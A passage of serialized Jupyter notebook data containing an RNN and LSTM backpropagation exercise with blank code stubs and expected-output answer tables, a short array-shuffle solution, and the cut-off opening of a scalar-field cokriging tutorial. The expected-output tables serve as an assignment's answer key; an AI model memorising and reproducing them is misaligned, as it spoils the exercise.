"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **gradients[\"dxt\"][1][2]** =\n </td>\n <td>\n -0.460564103059\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dxt\"].shape** =\n </td>\n <td>\n (3, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da_prev\"][2][3]** =\n </td>\n <td>\n 0.0842968653807\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da_prev\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWax\"][3][1]** =\n </td>\n <td>\n 0.393081873922\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWax\"].shape** =\n </td>\n <td>\n (5, 3)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWaa\"][1][2]** = \n </td>\n <td>\n -0.28483955787\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWaa\"].shape** =\n </td>\n <td>\n (5, 5)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dba\"][4]** = \n </td>\n <td>\n [ 0.80517166]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dba\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"#### Backward pass through the RNN\n\nComputing the gradients of the cost with respect to $a^{\\langle t \\rangle}$ at every time-step $t$ is useful because it is what helps the gradient backpropagate to the previous RNN-cell. To do so, you need to iterate through all the time steps starting at the end, and at each step, you increment the overall $db_a$, $dW_{aa}$, $dW_{ax}$ and you store $dx$.\n\n**Instructions**:\n\nImplement the `rnn_backward` function. Initialize the return variables with zeros first and then loop through all the time steps while calling the `rnn_cell_backward` at each time timestep, update the other variables accordingly.",
"_____no_output_____"
]
],
[
[
"def rnn_backward(da, caches):\n \"\"\"\n Implement the backward pass for a RNN over an entire sequence of input data.\n\n Arguments:\n da -- Upstream gradients of all hidden states, of shape (n_a, m, T_x)\n caches -- tuple containing information from the forward pass (rnn_forward)\n \n Returns:\n gradients -- python dictionary containing:\n dx -- Gradient w.r.t. the input data, numpy-array of shape (n_x, m, T_x)\n da0 -- Gradient w.r.t the initial hidden state, numpy-array of shape (n_a, m)\n dWax -- Gradient w.r.t the input's weight matrix, numpy-array of shape (n_a, n_x)\n dWaa -- Gradient w.r.t the hidden state's weight matrix, numpy-arrayof shape (n_a, n_a)\n dba -- Gradient w.r.t the bias, of shape (n_a, 1)\n \"\"\"\n \n ### START CODE HERE ###\n \n # Retrieve values from the first cache (t=1) of caches (≈2 lines)\n (caches, x) = None\n (a1, a0, x1, parameters) = None\n \n # Retrieve dimensions from da's and x1's shapes (≈2 lines)\n n_a, m, T_x = None\n n_x, m = None\n \n # initialize the gradients with the right sizes (≈6 lines)\n dx = None\n dWax = None\n dWaa = None\n dba = None\n da0 = None\n da_prevt = None\n \n # Loop through all the time steps\n for t in reversed(range(None)):\n # Compute gradients at time step t. Choose wisely the \"da_next\" and the \"cache\" to use in the backward propagation step. (≈1 line)\n gradients = None\n # Retrieve derivatives from gradients (≈ 1 line)\n dxt, da_prevt, dWaxt, dWaat, dbat = gradients[\"dxt\"], gradients[\"da_prev\"], gradients[\"dWax\"], gradients[\"dWaa\"], gradients[\"dba\"]\n # Increment global derivatives w.r.t parameters by adding their derivative at time-step t (≈4 lines)\n dx[:, :, t] = None\n dWax += None\n dWaa += None\n dba += None\n \n # Set da0 to the gradient of a which has been backpropagated through all time-steps (≈1 line) \n da0 = None\n ### END CODE HERE ###\n\n # Store the gradients in a python dictionary\n gradients = {\"dx\": dx, \"da0\": da0, \"dWax\": dWax, \"dWaa\": dWaa,\"dba\": dba}\n \n return gradients",
"_____no_output_____"
],
[
"np.random.seed(1)\nx = np.random.randn(3,10,4)\na0 = np.random.randn(5,10)\nWax = np.random.randn(5,3)\nWaa = np.random.randn(5,5)\nWya = np.random.randn(2,5)\nba = np.random.randn(5,1)\nby = np.random.randn(2,1)\nparameters = {\"Wax\": Wax, \"Waa\": Waa, \"Wya\": Wya, \"ba\": ba, \"by\": by}\na, y, caches = rnn_forward(x, a0, parameters)\nda = np.random.randn(5, 10, 4)\ngradients = rnn_backward(da, caches)\n\nprint(\"gradients[\\\"dx\\\"][1][2] =\", gradients[\"dx\"][1][2])\nprint(\"gradients[\\\"dx\\\"].shape =\", gradients[\"dx\"].shape)\nprint(\"gradients[\\\"da0\\\"][2][3] =\", gradients[\"da0\"][2][3])\nprint(\"gradients[\\\"da0\\\"].shape =\", gradients[\"da0\"].shape)\nprint(\"gradients[\\\"dWax\\\"][3][1] =\", gradients[\"dWax\"][3][1])\nprint(\"gradients[\\\"dWax\\\"].shape =\", gradients[\"dWax\"].shape)\nprint(\"gradients[\\\"dWaa\\\"][1][2] =\", gradients[\"dWaa\"][1][2])\nprint(\"gradients[\\\"dWaa\\\"].shape =\", gradients[\"dWaa\"].shape)\nprint(\"gradients[\\\"dba\\\"][4] =\", gradients[\"dba\"][4])\nprint(\"gradients[\\\"dba\\\"].shape =\", gradients[\"dba\"].shape)",
"_____no_output_____"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **gradients[\"dx\"][1][2]** =\n </td>\n <td>\n [-2.07101689 -0.59255627 0.02466855 0.01483317]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dx\"].shape** =\n </td>\n <td>\n (3, 10, 4)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da0\"][2][3]** =\n </td>\n <td>\n -0.314942375127\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da0\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWax\"][3][1]** =\n </td>\n <td>\n 11.2641044965\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWax\"].shape** =\n </td>\n <td>\n (5, 3)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWaa\"][1][2]** = \n </td>\n <td>\n 2.30333312658\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWaa\"].shape** =\n </td>\n <td>\n (5, 5)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dba\"][4]** = \n </td>\n <td>\n [-0.74747722]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dba\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"## 3.2 - LSTM backward pass",
"_____no_output_____"
],
[
"### 3.2.1 One Step backward\n\nThe LSTM backward pass is slighltly more complicated than the forward one. We have provided you with all the equations for the LSTM backward pass below. (If you enjoy calculus exercises feel free to try deriving these from scratch yourself.) \n\n### 3.2.2 gate derivatives\n\n$$d \\Gamma_o^{\\langle t \\rangle} = da_{next}*\\tanh(c_{next}) * \\Gamma_o^{\\langle t \\rangle}*(1-\\Gamma_o^{\\langle t \\rangle})\\tag{7}$$\n\n$$d\\tilde c^{\\langle t \\rangle} = dc_{next}*\\Gamma_u^{\\langle t \\rangle}+ \\Gamma_o^{\\langle t \\rangle} (1-\\tanh(c_{next})^2) * i_t * da_{next} * \\tilde c^{\\langle t \\rangle} * (1-\\tanh(\\tilde c)^2) \\tag{8}$$\n\n$$d\\Gamma_u^{\\langle t \\rangle} = dc_{next}*\\tilde c^{\\langle t \\rangle} + \\Gamma_o^{\\langle t \\rangle} (1-\\tanh(c_{next})^2) * \\tilde c^{\\langle t \\rangle} * da_{next}*\\Gamma_u^{\\langle t \\rangle}*(1-\\Gamma_u^{\\langle t \\rangle})\\tag{9}$$\n\n$$d\\Gamma_f^{\\langle t \\rangle} = dc_{next}*\\tilde c_{prev} + \\Gamma_o^{\\langle t \\rangle} (1-\\tanh(c_{next})^2) * c_{prev} * da_{next}*\\Gamma_f^{\\langle t \\rangle}*(1-\\Gamma_f^{\\langle t \\rangle})\\tag{10}$$\n\n### 3.2.3 parameter derivatives \n\n$$ dW_f = d\\Gamma_f^{\\langle t \\rangle} * \\begin{pmatrix} a_{prev} \\\\ x_t\\end{pmatrix}^T \\tag{11} $$\n$$ dW_u = d\\Gamma_u^{\\langle t \\rangle} * \\begin{pmatrix} a_{prev} \\\\ x_t\\end{pmatrix}^T \\tag{12} $$\n$$ dW_c = d\\tilde c^{\\langle t \\rangle} * \\begin{pmatrix} a_{prev} \\\\ x_t\\end{pmatrix}^T \\tag{13} $$\n$$ dW_o = d\\Gamma_o^{\\langle t \\rangle} * \\begin{pmatrix} a_{prev} \\\\ x_t\\end{pmatrix}^T \\tag{14}$$\n\nTo calculate $db_f, db_u, db_c, db_o$ you just need to sum across the horizontal (axis= 1) axis on $d\\Gamma_f^{\\langle t \\rangle}, d\\Gamma_u^{\\langle t \\rangle}, d\\tilde c^{\\langle t \\rangle}, d\\Gamma_o^{\\langle t \\rangle}$ respectively. Note that you should have the `keep_dims = True` option.\n\nFinally, you will compute the derivative with respect to the previous hidden state, previous memory state, and input.\n\n$$ da_{prev} = W_f^T*d\\Gamma_f^{\\langle t \\rangle} + W_u^T * d\\Gamma_u^{\\langle t \\rangle}+ W_c^T * d\\tilde c^{\\langle t \\rangle} + W_o^T * d\\Gamma_o^{\\langle t \\rangle} \\tag{15}$$\nHere, the weights for equations 13 are the first n_a, (i.e. $W_f = W_f[:n_a,:]$ etc...)\n\n$$ dc_{prev} = dc_{next}\\Gamma_f^{\\langle t \\rangle} + \\Gamma_o^{\\langle t \\rangle} * (1- \\tanh(c_{next})^2)*\\Gamma_f^{\\langle t \\rangle}*da_{next} \\tag{16}$$\n$$ dx^{\\langle t \\rangle} = W_f^T*d\\Gamma_f^{\\langle t \\rangle} + W_u^T * d\\Gamma_u^{\\langle t \\rangle}+ W_c^T * d\\tilde c_t + W_o^T * d\\Gamma_o^{\\langle t \\rangle}\\tag{17} $$\nwhere the weights for equation 15 are from n_a to the end, (i.e. $W_f = W_f[n_a:,:]$ etc...)\n\n**Exercise:** Implement `lstm_cell_backward` by implementing equations $7-17$ below. Good luck! :)",
"_____no_output_____"
]
],
[
[
"def lstm_cell_backward(da_next, dc_next, cache):\n \"\"\"\n Implement the backward pass for the LSTM-cell (single time-step).\n\n Arguments:\n da_next -- Gradients of next hidden state, of shape (n_a, m)\n dc_next -- Gradients of next cell state, of shape (n_a, m)\n cache -- cache storing information from the forward pass\n\n Returns:\n gradients -- python dictionary containing:\n dxt -- Gradient of input data at time-step t, of shape (n_x, m)\n da_prev -- Gradient w.r.t. the previous hidden state, numpy array of shape (n_a, m)\n dc_prev -- Gradient w.r.t. the previous memory state, of shape (n_a, m, T_x)\n dWf -- Gradient w.r.t. the weight matrix of the forget gate, numpy array of shape (n_a, n_a + n_x)\n dWi -- Gradient w.r.t. the weight matrix of the update gate, numpy array of shape (n_a, n_a + n_x)\n dWc -- Gradient w.r.t. the weight matrix of the memory gate, numpy array of shape (n_a, n_a + n_x)\n dWo -- Gradient w.r.t. the weight matrix of the output gate, numpy array of shape (n_a, n_a + n_x)\n dbf -- Gradient w.r.t. biases of the forget gate, of shape (n_a, 1)\n dbi -- Gradient w.r.t. biases of the update gate, of shape (n_a, 1)\n dbc -- Gradient w.r.t. biases of the memory gate, of shape (n_a, 1)\n dbo -- Gradient w.r.t. biases of the output gate, of shape (n_a, 1)\n \"\"\"\n\n # Retrieve information from \"cache\"\n (a_next, c_next, a_prev, c_prev, ft, it, cct, ot, xt, parameters) = cache\n \n ### START CODE HERE ###\n # Retrieve dimensions from xt's and a_next's shape (≈2 lines)\n n_x, m = None\n n_a, m = None\n \n # Compute gates related derivatives, you can find their values can be found by looking carefully at equations (7) to (10) (≈4 lines)\n dot = None\n dcct = None\n dit = None\n dft = None\n \n # Code equations (7) to (10) (≈4 lines)\n dit = None\n dft = None\n dot = None\n dcct = None\n\n # Compute parameters related derivatives. Use equations (11)-(14) (≈8 lines)\n dWf = None\n dWi = None\n dWc = None\n dWo = None\n dbf = None\n dbi = None\n dbc = None\n dbo = None\n\n # Compute derivatives w.r.t previous hidden state, previous memory state and input. Use equations (15)-(17). (≈3 lines)\n da_prev = None\n dc_prev = None\n dxt = None\n ### END CODE HERE ###\n \n # Save gradients in dictionary\n gradients = {\"dxt\": dxt, \"da_prev\": da_prev, \"dc_prev\": dc_prev, \"dWf\": dWf,\"dbf\": dbf, \"dWi\": dWi,\"dbi\": dbi,\n \"dWc\": dWc,\"dbc\": dbc, \"dWo\": dWo,\"dbo\": dbo}\n\n return gradients",
"_____no_output_____"
],
[
"np.random.seed(1)\nxt = np.random.randn(3,10)\na_prev = np.random.randn(5,10)\nc_prev = np.random.randn(5,10)\nWf = np.random.randn(5, 5+3)\nbf = np.random.randn(5,1)\nWi = np.random.randn(5, 5+3)\nbi = np.random.randn(5,1)\nWo = np.random.randn(5, 5+3)\nbo = np.random.randn(5,1)\nWc = np.random.randn(5, 5+3)\nbc = np.random.randn(5,1)\nWy = np.random.randn(2,5)\nby = np.random.randn(2,1)\n\nparameters = {\"Wf\": Wf, \"Wi\": Wi, \"Wo\": Wo, \"Wc\": Wc, \"Wy\": Wy, \"bf\": bf, \"bi\": bi, \"bo\": bo, \"bc\": bc, \"by\": by}\n\na_next, c_next, yt, cache = lstm_cell_forward(xt, a_prev, c_prev, parameters)\n\nda_next = np.random.randn(5,10)\ndc_next = np.random.randn(5,10)\ngradients = lstm_cell_backward(da_next, dc_next, cache)\nprint(\"gradients[\\\"dxt\\\"][1][2] =\", gradients[\"dxt\"][1][2])\nprint(\"gradients[\\\"dxt\\\"].shape =\", gradients[\"dxt\"].shape)\nprint(\"gradients[\\\"da_prev\\\"][2][3] =\", gradients[\"da_prev\"][2][3])\nprint(\"gradients[\\\"da_prev\\\"].shape =\", gradients[\"da_prev\"].shape)\nprint(\"gradients[\\\"dc_prev\\\"][2][3] =\", gradients[\"dc_prev\"][2][3])\nprint(\"gradients[\\\"dc_prev\\\"].shape =\", gradients[\"dc_prev\"].shape)\nprint(\"gradients[\\\"dWf\\\"][3][1] =\", gradients[\"dWf\"][3][1])\nprint(\"gradients[\\\"dWf\\\"].shape =\", gradients[\"dWf\"].shape)\nprint(\"gradients[\\\"dWi\\\"][1][2] =\", gradients[\"dWi\"][1][2])\nprint(\"gradients[\\\"dWi\\\"].shape =\", gradients[\"dWi\"].shape)\nprint(\"gradients[\\\"dWc\\\"][3][1] =\", gradients[\"dWc\"][3][1])\nprint(\"gradients[\\\"dWc\\\"].shape =\", gradients[\"dWc\"].shape)\nprint(\"gradients[\\\"dWo\\\"][1][2] =\", gradients[\"dWo\"][1][2])\nprint(\"gradients[\\\"dWo\\\"].shape =\", gradients[\"dWo\"].shape)\nprint(\"gradients[\\\"dbf\\\"][4] =\", gradients[\"dbf\"][4])\nprint(\"gradients[\\\"dbf\\\"].shape =\", gradients[\"dbf\"].shape)\nprint(\"gradients[\\\"dbi\\\"][4] =\", gradients[\"dbi\"][4])\nprint(\"gradients[\\\"dbi\\\"].shape =\", gradients[\"dbi\"].shape)\nprint(\"gradients[\\\"dbc\\\"][4] =\", gradients[\"dbc\"][4])\nprint(\"gradients[\\\"dbc\\\"].shape =\", gradients[\"dbc\"].shape)\nprint(\"gradients[\\\"dbo\\\"][4] =\", gradients[\"dbo\"][4])\nprint(\"gradients[\\\"dbo\\\"].shape =\", gradients[\"dbo\"].shape)",
"_____no_output_____"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **gradients[\"dxt\"][1][2]** =\n </td>\n <td>\n 3.23055911511\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dxt\"].shape** =\n </td>\n <td>\n (3, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da_prev\"][2][3]** =\n </td>\n <td>\n -0.0639621419711\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da_prev\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dc_prev\"][2][3]** =\n </td>\n <td>\n 0.797522038797\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dc_prev\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWf\"][3][1]** = \n </td>\n <td>\n -0.147954838164\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWf\"].shape** =\n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWi\"][1][2]** = \n </td>\n <td>\n 1.05749805523\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWi\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWc\"][3][1]** = \n </td>\n <td>\n 2.30456216369\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWc\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWo\"][1][2]** = \n </td>\n <td>\n 0.331311595289\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWo\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbf\"][4]** = \n </td>\n <td>\n [ 0.18864637]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbf\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbi\"][4]** = \n </td>\n <td>\n [-0.40142491]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbi\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbc\"][4]** = \n </td>\n <td>\n [ 0.25587763]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbc\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbo\"][4]** = \n </td>\n <td>\n [ 0.13893342]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbo\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"### 3.3 Backward pass through the LSTM RNN\n\nThis part is very similar to the `rnn_backward` function you implemented above. You will first create variables of the same dimension as your return variables. You will then iterate over all the time steps starting from the end and call the one step function you implemented for LSTM at each iteration. You will then update the parameters by summing them individually. Finally return a dictionary with the new gradients. \n\n**Instructions**: Implement the `lstm_backward` function. Create a for loop starting from $T_x$ and going backward. For each step call `lstm_cell_backward` and update the your old gradients by adding the new gradients to them. Note that `dxt` is not updated but is stored.",
"_____no_output_____"
]
],
[
[
"def lstm_backward(da, caches):\n \n \"\"\"\n Implement the backward pass for the RNN with LSTM-cell (over a whole sequence).\n\n Arguments:\n da -- Gradients w.r.t the hidden states, numpy-array of shape (n_a, m, T_x)\n caches -- cache storing information from the forward pass (lstm_forward)\n\n Returns:\n gradients -- python dictionary containing:\n dx -- Gradient of inputs, of shape (n_x, m, T_x)\n da0 -- Gradient w.r.t. the previous hidden state, numpy array of shape (n_a, m)\n dWf -- Gradient w.r.t. the weight matrix of the forget gate, numpy array of shape (n_a, n_a + n_x)\n dWi -- Gradient w.r.t. the weight matrix of the update gate, numpy array of shape (n_a, n_a + n_x)\n dWc -- Gradient w.r.t. the weight matrix of the memory gate, numpy array of shape (n_a, n_a + n_x)\n dWo -- Gradient w.r.t. the weight matrix of the save gate, numpy array of shape (n_a, n_a + n_x)\n dbf -- Gradient w.r.t. biases of the forget gate, of shape (n_a, 1)\n dbi -- Gradient w.r.t. biases of the update gate, of shape (n_a, 1)\n dbc -- Gradient w.r.t. biases of the memory gate, of shape (n_a, 1)\n dbo -- Gradient w.r.t. biases of the save gate, of shape (n_a, 1)\n \"\"\"\n\n # Retrieve values from the first cache (t=1) of caches.\n (caches, x) = caches\n (a1, c1, a0, c0, f1, i1, cc1, o1, x1, parameters) = caches[0]\n \n ### START CODE HERE ###\n # Retrieve dimensions from da's and x1's shapes (≈2 lines)\n n_a, m, T_x = None\n n_x, m = None\n \n # initialize the gradients with the right sizes (≈12 lines)\n dx = None\n da0 = None\n da_prevt = None\n dc_prevt = None\n dWf = None\n dWi = None\n dWc = None\n dWo = None\n dbf = None\n dbi = None\n dbc = None\n dbo = None\n \n # loop back over the whole sequence\n for t in reversed(range(None)):\n # Compute all gradients using lstm_cell_backward\n gradients = None\n # Store or add the gradient to the parameters' previous step's gradient\n dx[:,:,t] = None\n dWf = None\n dWi = None\n dWc = None\n dWo = None\n dbf = None\n dbi = None\n dbc = None\n dbo = None\n # Set the first activation's gradient to the backpropagated gradient da_prev.\n da0 = None\n \n ### END CODE HERE ###\n\n # Store the gradients in a python dictionary\n gradients = {\"dx\": dx, \"da0\": da0, \"dWf\": dWf,\"dbf\": dbf, \"dWi\": dWi,\"dbi\": dbi,\n \"dWc\": dWc,\"dbc\": dbc, \"dWo\": dWo,\"dbo\": dbo}\n \n return gradients",
"_____no_output_____"
],
[
"np.random.seed(1)\nx = np.random.randn(3,10,7)\na0 = np.random.randn(5,10)\nWf = np.random.randn(5, 5+3)\nbf = np.random.randn(5,1)\nWi = np.random.randn(5, 5+3)\nbi = np.random.randn(5,1)\nWo = np.random.randn(5, 5+3)\nbo = np.random.randn(5,1)\nWc = np.random.randn(5, 5+3)\nbc = np.random.randn(5,1)\n\nparameters = {\"Wf\": Wf, \"Wi\": Wi, \"Wo\": Wo, \"Wc\": Wc, \"Wy\": Wy, \"bf\": bf, \"bi\": bi, \"bo\": bo, \"bc\": bc, \"by\": by}\n\na, y, c, caches = lstm_forward(x, a0, parameters)\n\nda = np.random.randn(5, 10, 4)\ngradients = lstm_backward(da, caches)\n\nprint(\"gradients[\\\"dx\\\"][1][2] =\", gradients[\"dx\"][1][2])\nprint(\"gradients[\\\"dx\\\"].shape =\", gradients[\"dx\"].shape)\nprint(\"gradients[\\\"da0\\\"][2][3] =\", gradients[\"da0\"][2][3])\nprint(\"gradients[\\\"da0\\\"].shape =\", gradients[\"da0\"].shape)\nprint(\"gradients[\\\"dWf\\\"][3][1] =\", gradients[\"dWf\"][3][1])\nprint(\"gradients[\\\"dWf\\\"].shape =\", gradients[\"dWf\"].shape)\nprint(\"gradients[\\\"dWi\\\"][1][2] =\", gradients[\"dWi\"][1][2])\nprint(\"gradients[\\\"dWi\\\"].shape =\", gradients[\"dWi\"].shape)\nprint(\"gradients[\\\"dWc\\\"][3][1] =\", gradients[\"dWc\"][3][1])\nprint(\"gradients[\\\"dWc\\\"].shape =\", gradients[\"dWc\"].shape)\nprint(\"gradients[\\\"dWo\\\"][1][2] =\", gradients[\"dWo\"][1][2])\nprint(\"gradients[\\\"dWo\\\"].shape =\", gradients[\"dWo\"].shape)\nprint(\"gradients[\\\"dbf\\\"][4] =\", gradients[\"dbf\"][4])\nprint(\"gradients[\\\"dbf\\\"].shape =\", gradients[\"dbf\"].shape)\nprint(\"gradients[\\\"dbi\\\"][4] =\", gradients[\"dbi\"][4])\nprint(\"gradients[\\\"dbi\\\"].shape =\", gradients[\"dbi\"].shape)\nprint(\"gradients[\\\"dbc\\\"][4] =\", gradients[\"dbc\"][4])\nprint(\"gradients[\\\"dbc\\\"].shape =\", gradients[\"dbc\"].shape)\nprint(\"gradients[\\\"dbo\\\"][4] =\", gradients[\"dbo\"][4])\nprint(\"gradients[\\\"dbo\\\"].shape =\", gradients[\"dbo\"].shape)",
"_____no_output_____"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **gradients[\"dx\"][1][2]** =\n </td>\n <td>\n [-0.00173313 0.08287442 -0.30545663 -0.43281115]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dx\"].shape** =\n </td>\n <td>\n (3, 10, 4)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da0\"][2][3]** =\n </td>\n <td>\n -0.095911501954\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"da0\"].shape** =\n </td>\n <td>\n (5, 10)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWf\"][3][1]** = \n </td>\n <td>\n -0.0698198561274\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWf\"].shape** =\n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWi\"][1][2]** = \n </td>\n <td>\n 0.102371820249\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWi\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWc\"][3][1]** = \n </td>\n <td>\n -0.0624983794927\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWc\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWo\"][1][2]** = \n </td>\n <td>\n 0.0484389131444\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dWo\"].shape** = \n </td>\n <td>\n (5, 8)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbf\"][4]** = \n </td>\n <td>\n [-0.0565788]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbf\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbi\"][4]** = \n </td>\n <td>\n [-0.06997391]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbi\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbc\"][4]** = \n </td>\n <td>\n [-0.27441821]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbc\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbo\"][4]** = \n </td>\n <td>\n [ 0.16532821]\n </td>\n </tr>\n <tr>\n <td>\n **gradients[\"dbo\"].shape** = \n </td>\n <td>\n (5, 1)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"### Congratulations !\n\nCongratulations on completing this assignment. You now understand how recurrent neural networks work! \n\nLet's go on to the next exercise, where you'll use an RNN to build a character-level language model.\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
]
] |
e70922329339d7bedeb88fe80963a72c27caccb8 | 1,709 | ipynb | Jupyter Notebook | easy/shuffle an array.ipynb | FourierYe/algorithm_python | 24c56f82cecb8b4614722094ca8cfc63cefba670 | [
"MIT"
] | null | null | null | easy/shuffle an array.ipynb | FourierYe/algorithm_python | 24c56f82cecb8b4614722094ca8cfc63cefba670 | [
"MIT"
] | null | null | null | easy/shuffle an array.ipynb | FourierYe/algorithm_python | 24c56f82cecb8b4614722094ca8cfc63cefba670 | [
"MIT"
] | null | null | null | 25.132353 | 78 | 0.472206 | [
[
[
"import random\nclass Solution:\n\n def __init__(self, nums: List[int]):\n self.nums = nums\n self.default = list(self.nums)\n\n def reset(self) -> List[int]:\n \"\"\"\n Resets the array to its original configuration and return it.\n \"\"\"\n self.nums = list(self.default)\n return self.default\n\n def shuffle(self) -> List[int]:\n \"\"\"\n Returns a random shuffling of the array.\n \"\"\"\n cp_nums = list(self.nums)\n\n for i in range(len(cp_nums)):\n nums_index = random.randrange(len(self.nums))\n cp_nums[i] = self.nums.pop(nums_index)\n \n self.nums = cp_nums\n\n return self.nums\n \n\n\n# Your Solution object will be instantiated and called as such:\n# obj = Solution(nums)\n# param_1 = obj.reset()\n# param_2 = obj.shuffle()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
e7092507a5f93b21b5c2ed76af4e40073c635c20 | 206,587 | ipynb | Jupyter Notebook | geomodeling/scalar_field_cokriging_minimal_example.ipynb | cgre-aachen/teaching | 411bd3df76b7efee4a4ee311e06d1b0cf9aab8a1 | [
"MIT"
] | 9 | 2018-02-16T10:24:51.000Z | 2021-07-30T13:13:28.000Z | geomodeling/scalar_field_cokriging_minimal_example.ipynb | cgre-aachen/teaching | 411bd3df76b7efee4a4ee311e06d1b0cf9aab8a1 | [
"MIT"
] | null | null | null | geomodeling/scalar_field_cokriging_minimal_example.ipynb | cgre-aachen/teaching | 411bd3df76b7efee4a4ee311e06d1b0cf9aab8a1 | [
"MIT"
] | 4 | 2018-01-08T08:36:19.000Z | 2022-01-29T11:55:08.000Z | 115.154404 | 71,768 | 0.84121 | [
[
[
"# Minimal working example for cokringing of a scalar field for geological modeling\n\nThe aim of this notebook is to explain in simple steps the scalar-field (or: potential-field) interpolation implemented in GemPy and GeoModeller, based on Lajaunie et al. (1997) and Calcagno et al. (2008). The derivation and description of the covariance functions follows from the thesis of Aug (2004) and the implementation in GemPy (de la Varga et al., submitted).\n\n## Basic principle behind a scalar-field interpolation\n\nThe method is based on a zonation principle, i.e. a segmentation of continuous space into discrete zones with similar properties (or other aspects of interest). Typical examples are the distinction of rock units with different lithological features (e.g. different types of sandstones, clay layers, magmatic sequences, etc), but also metamorphic sequences that can be distinguished. Quite generally, it is basically the same concept that is underlying the construction of geological map.\n\nThe general idea behind this interpolation method is that geological structures exhibit a specific continuity. As a very basic first principle, 